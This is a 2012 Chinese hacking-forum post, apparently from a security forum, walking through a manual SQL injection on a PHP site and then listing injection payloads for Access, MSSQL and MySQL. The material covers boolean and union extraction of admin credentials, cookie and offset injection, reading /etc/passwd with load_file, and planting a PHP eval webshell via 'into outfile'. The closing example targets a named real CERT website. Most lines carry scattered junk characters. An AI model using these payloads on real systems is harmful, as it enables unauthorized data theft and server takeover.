找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2887|回复: 2
打印 上一主题 下一主题

手工注入拿下一站

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-23 14:47:22 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
我一个朋友维护一个站点,他对安全不是很懂,就像我一样,呵呵 !O(∩_∩)O~4 x8 h1 I8 s( C  c
让我看看,既然人家开口了,我也不好拒绝,那就看看吧?
1 P( x2 V, j4 Z: a我个人喜欢先看有没有上传的地方(上传可是好东西,可以直接拿shell'),其次就是看看什么程序,有没有通杀,然后就是后台,最后看看注入。。。。
% L; y7 j' v9 ?6 B+ S如果是php程序我会先找注入,呵呵!(这个不用我说你们也知道是什么原因咯,废话了,主题开始。。。)& M7 Y" k8 _6 {/ |- ~! m
1.打开地址,发现是php程序,呵呵.既然是php程序,先找找注入吧?看看有没有交互的地方,(所谓交互就是像news.php?id=1,news.asp?id=1这样的,)7 u+ B4 L! A+ Q) K. ~0 P
这个站很悲剧,随便点开一个链接加一个 ’ 结果悲剧了,爆出:
/ J- [) g( S, k- @5 m$ EWarning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in
6 z% j* m+ \+ T/ v4 L; O9 d6 o/data/home/nus42j1/htdocs/news.php on line 59 ,物理路径出来了,到这一步啊,已经可以证实存在注入. A' f2 o- {0 U7 C( _) x, a
                         * e4 j- u4 d$ T0 p9 q  `3 R+ d, B
2.不过既然是学习,我们就要一步一步的来,还是老规矩 and 1=1 ,and 1=2 ,返回结果不一样,证明存在注入,
9 V: Z% _9 p4 A1 w) ~3.下一步很自然的查询字段数:用order by+二分法,加上order by 8 返回正常,order by 9 不正常。说明字段数为8 ,继续提交 and 1=2 union select 1,2,3,4,5,6,7,8 - -返回一个3   ,一个5 ,说明可以利用字段数才两个,有时候会有很多个哦,要注意* t2 W' v2 \# l& B7 P! P. d
4.继续提交and 1=2 union select 1,2,user(),4,version(),6,7,8-- ,当然还有database(),等等.......返回版本,用户等等系列信息
% z( \% H7 [0 o) G5.rp差了一点,不是root权限,不过版本大于5.0,支持虚拟库information_schema。, R- f! _: I7 t$ h2 x( P
有两种思路:1.使用Load_file函数获取数据库账号密码,通过操作数据库获取webshell,/ X- C( {3 t. M& W0 t
2.继续爆出数据库里的表名和列名,登陆后台想办法上传获取webshell。) E3 [' I4 S* z& j
我就用的是第二个思路,! P. ^: q2 M. h4 l! [
提交and 1=2 union select 1,2,3,4,table_name,6,7,8  from information_schema.tables where table_schema=database() limit 0,1--  & u* D* {; X' S8 k9 h
6.由于数据库表比较多,这里有48个表,我只是做检测,原理是这样,剩下的只要把 limit 0,1 中的0一次往上加可以爆出所有表名,然后是获取表里的字段,$ e; N3 ~. y$ y& M, H
提交:and 1=2 union select 1,2,3,4, COLUMN_NAME,6,7,8 from information_schema.columns where table_name=0x635F61646D696E5F616373696F6E limit 0,1--
( z# M9 ~# S. |5 I- ]注意:这里的0x635F61646D696E5F616373696F6E是kc_admin_action 表的十六进制表示,得到密码账号后就到md5破解网站进行破解。  A' p- x5 L" x4 [8 b
7.到这里呢我该结束了,还要提供给我朋友修补的意见,不过写了这么多了,也不怕在写一点,延伸思路,如果你的密文md5破不出来呢????怎么办????
& @- u" I- c7 |是不是放弃了,当然不是,看看开了什么端口,如果是centos,lamp环境。我们自然是用load_file了,先验证有读的权限, /etc/passwd.....
9 q! v. I* c9 z# |9 C# ?% s( H提交:and 1=2 union select 1,2,3,4,load_file(你要找的东东),6,7,8 --- \) V7 Z4 m3 R$ _. a; q
然后你就找你要的信息,主要是一些敏感文件,还有就是有没有前辈留下的东西,比如某些记录口令保存在本地的东东,我们还可以通过操作数据库备份出来一个shell,& f! d' T$ h5 _8 U0 e+ O( P
调出mysql命令,执行:Select '<?php eval($_POST[cmd]);?>' into outfile '/xxx/xxx/1.php ,也可以分步执行建立一个临时表插入一句话,然后备份,前者比较简单并且不容易误删什么东西。前提是我们要有写入权限....../ \" ~( M# p7 ^' [$ N
下面是一些很普遍注入方式资料:
+ p* L) {" U. u! h注意:对于普通的get注入,如果是字符型,前加' 后加 and ''='! {. k& e$ ~; a4 [" d: C
拆半法
4 r5 H( U5 [7 }, `* n: C####################################### S; M% t4 q: V6 c0 Z, c, S: M9 p
and exists (select * from MSysAccessObjects) 这个是判断是不是ACC数据库,MSysAccessObjects是ACCESS的默认表。. p. d* ]* G# }8 v+ [
and exists (select * from admin). m  V5 Z0 E* B2 V
and exists(select id from admin)
7 _3 {- [7 \! q- b9 ?& I% tand exists(select id from admin where id=1)
; `, T9 [8 O  v6 ~2 z+ }) B  {5 Eand exists(select id from admin where id>1)
3 X# @! c& ~1 O然后再测试下id>1 正常则说明不止一个ID 然后再id<50 确定范围
% H$ e" o% W% f0 M5 K0 h8 v" Tand exists (select username from admin)9 P: @; B# n9 c7 {
and exists (select password from admin)3 ]1 {& f; _% O" @; x8 f
and exists (select id from admin where len(username)<10 and id=1)
% g% Z9 l7 F- L* `6 E0 Gand exists (select id from admin where len(username)>5 and id=1); j1 i8 G2 K7 ]! w1 ?0 ]% z8 h
and exists (select id from admin where len(username)=6 and id=1)! e/ Q! T% \+ w5 J6 A
and exists (select id from admin where len(password)<10 and id=1)
+ e) B8 O3 M' _$ |/ Band exists (select id from admin where len(password)>5 and id=1)
1 a2 R0 _2 a3 @and exists (select id from admin where len(password)=7 and id=1)
  ], N# F: ^0 wand (select top 1 asc(mid(username,1,1)) from admin)=97
5 N4 B' d! x5 O* H+ K7 c+ R# M返回了正常,说明第一username里的第一位内容是ASC码的97,也就是a。! x7 v& Z! Q& y. N( A" B
猜第二位把username,1,1改成username,2,1就可以了。- y" _, }( N4 P5 Y: q
猜密码把username改成password就OK了) n* m5 I- _& e/ Y6 ?% B
##################################################$ R: i3 O$ [# [) C3 r. Z4 T
搜索型注入
% a# z% F- y0 G' S5 Q3 p. j5 K  w##################################& J7 `" s  D: w3 X( T$ P' H
%' and 1=1 and '%'='7 X# A8 Q. u" B- C
%' and exists (select * from admin) and '%'='! }7 p! y5 T" F' |8 D" v
%' and exists(select id from admin where id=1) and '%'='
7 n1 b4 v( O% B$ p2 m9 Y%' and exists (select id from admin where len(username)<10 and id=1) and '%'='
. }  T0 M# \( A  S%' and exists (select id from admin where len(password)=7 and id=1) and '%'='% j8 x& N9 o. E+ T
%' and (select top 1 asc(mid(username,1,1)) from admin)=97 and '%'='
8 W- g7 D+ `3 f- C& Q这里也说明一下,搜索型注入也无他,前加%' 后加 and '%'='. j. h$ P: A) @! L+ ]. G5 f' E' Y
对于MSSQL数据库,后面可以吧 and '%'='换成--
# }5 o+ B$ I- A3 {还有一点搜索型注入也可以使用union语句。& _9 T: Y% t3 W
########################################################: E3 Y) Q. [  k, H
联合查询。) H5 d# R, w4 N- ], O
#####################################& n: m( n" Y/ U6 ~7 U+ c
order by 10# ^- i( ]3 {4 z; U
and 1=2 union select 1,2,3,4,5,6,7,8,9,10, F7 ^, e! x- l- C: [% @/ j. ~# v% z
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin2 V2 T! k; P7 n; {# W
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
3 j% b/ L* J/ d  M2 Q3 z( A很简单。有一点要说明一下,where id=1 这个是爆ID=1的管理员的时候,where id=1就是爆ID=2的管理用的,一般不加where id=1这个限制语句,应该是爆的最前面的管理员吧!(注意,管理的id是多少可不一定哈,说不定是100呢!)5 g4 d" N& B* L7 ]
###################################. ]( p  d5 m- Z* R8 l" A! I
cookie注入
5 R, C1 [' R8 G4 A" O" p###############################* o( @: b/ R( H
http://www.******.com/shownews.asp?id=127
- @/ U2 Y$ q4 i: |8 shttp://www.******.com/shownews.asp9 b  }& S! k7 T% z4 m' h- `
alert(="id="+escape("127"));/ p6 v/ A8 N4 e3 L3 X
alert(="id="+escape("127 and 1=1"));
& M7 w2 X8 t. z' ualert(="id="+escape("127 order by 10"));  O2 ]% a+ B- T1 F- t0 z3 m
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));5 s3 R! M4 |9 G1 |7 R( G
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
* L/ n- ^, ?* ^8 k! J2 W) L. M# F这些东西应该都不用解释了吧,给出语句就行了吧。这里还是用个联合查询,你把它换成拆半也一样,不过不太适合正常人使用,因为曾经有人这样累死过。3 K, a3 i7 f2 U# [; ~4 s
###################################
5 Z, w. M' G) x2 H7 g8 j偏移注入
- H, D7 [2 i7 Z% F1 r8 X, G4 N/ l###########################################################
9 t4 g) ^, S! F4 ?! xunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin2 A# t9 ~6 C6 f# z* s  n
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
  u6 i3 p: [8 _8 m) d% `union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
5 J, w1 W/ W! R; C4 b3 x! Iunion select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id): P7 J9 `# ]; W7 m% A. @
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id); @6 J" E- H# }2 V% ]  ^& p! K: g
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
0 S* B. t- a0 ~; c: ~' z4 O5 W& Aunion select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on6 M4 I3 n* n0 `0 I* N
a.id=d.id)5 ]( K- a( r* ]9 D  }2 I
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
7 u1 }5 [# y8 Y0 u. u; t6 `1 Tand 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id) ( a! A6 j* I' ]' O
  
1 q( _7 d) n4 i) E! h============================================================================================================( C: U( w4 q0 j# ?  E
1.判断版本
* ]* |* U. V# [; Land ord(mid(version(),1,1))>515 y6 Y" L2 U5 H! d: k
返回正常,说明大于4.0版本,支持ounion查询) V0 h; d  C! F
2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解# P. p8 T0 V$ P' _
and 2=4 union select 1,2,3,4,5,6,7,8,9--
2 I: E) y! a1 r/ ?) |3.查看数据库版本及当前用户,4 }! u5 H. e  _: h+ O
and 2=4 union select 1,user(),version(),4,5,6,7,8,9--( [. `! m8 N& E' e- H; D: d% ]2 O
数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,
$ w! h. R# A1 w3 P& U5 _. C. O0 B0 o4.判断有没有写权限
' a5 r. {# _0 L9 Vand (select count(*) from MySQL.user)>0-- 4 i/ |) Q. @" m2 X! p$ a
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,1
* F2 s/ X1 |- Y! c1 g- L+ ]1 A用不了这个命令,就学习土耳其黑客手法,如下  R9 j# M7 A2 u
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--
; V2 c/ y7 G8 N7 R: N6 z2 x6.爆表,爆库
- K- z2 Y0 u5 X  C" }  M, yand+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--
* R1 M" j* R" c2 k, d- ~7.爆列名,爆表' n8 K# X1 T4 d0 N: W9 y5 F# L
and+1=0+union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
& Y( [: c0 a! M3 M9 G+ R8.查询字段数,直接用limit N,1去查询,直接N到报错为止。) O! K& {1 {: H' H! z- x+ ]
and+1=0+union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--
5 V# v; S- a& A9 s* M* \+ y/ d# x+ W9.爆字段内容
5 f! O6 e& l+ G  }" k9 tand+1=0+union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--3 N. }# Q% x$ ?5 p5 k- r
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
回复

使用道具 举报

沙发
发表于 2012-9-24 21:40:46 | 只看该作者
非常好的归纳。坐下慢慢看~
回复 支持 反对

使用道具 举报

板凳
发表于 2012-9-25 18:53:39 | 只看该作者
谢谢分享,学习思路啊
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表